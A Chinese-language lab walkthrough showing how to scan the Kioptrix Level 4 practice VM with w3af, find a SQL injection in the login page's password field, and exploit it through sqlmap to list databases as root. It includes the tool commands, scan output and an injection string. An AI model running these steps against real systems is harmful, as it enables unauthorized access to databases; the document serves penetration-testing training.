我要评论0×00 概述
在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.
0×01 简介
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×02 安装
root@bt:~# apt-get install w3af0×03 启动
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console0×04 漏洞扫描配置
w3af>>>plugins
//进入插件模块
w3af/plugins>>>list discovery
//列出所有用于发现的插件
w3af/plugins>>>discovery findBackdoor phpinfo webSpider
//启用findBackdoor phpinfo webSpider这三个插件
w3af/plugins>>>list audit
//列出所有用于漏洞的插件
w3af/plugins>>>audit blindSqli fileUpload osCommanding sqli xss
//启用blindSqli fileUpload osCommanding sqli xss这五个插件
w3af/plugins>>>back
//返回主模块
w3af>>>target
//进入配置目标的模块
w3af/config:target>>>settarget http://192.168.244.132/
//把目标设置为http://192.168.244.132/
w3af/config:target>>>back
//返回主模块0×05 漏洞扫描
w3af>>>start
---
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/ www.2cto.com
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---
//开始扫描0×06 漏洞利用配置
w3af>>>exploit
//进入漏洞利用模块
w3af/exploit>>>list exploit
//列出所有用于漏洞利用的插件
w3af/exploit>>>exploit sqlmap
//使用sqlmap进行SQL注入漏洞的测试
---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <sqlobject( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
Please use the interact command to interact with the shell objects.
---
//测试存在SQL注入漏洞
//这里要记住shell objects(这里是0),等一下要用到
0x07 漏洞利用
w3af/exploit>>> interact 0
//interact + shell object就可以利用了
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---
//sqlmap的一个交互式模块
w3af/exploit/sqlmap-0>>> dbs
---
Available databases: [3]:
[*] information_schema
[*] members
[*] mysql
---
//成功获得数据库信息
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论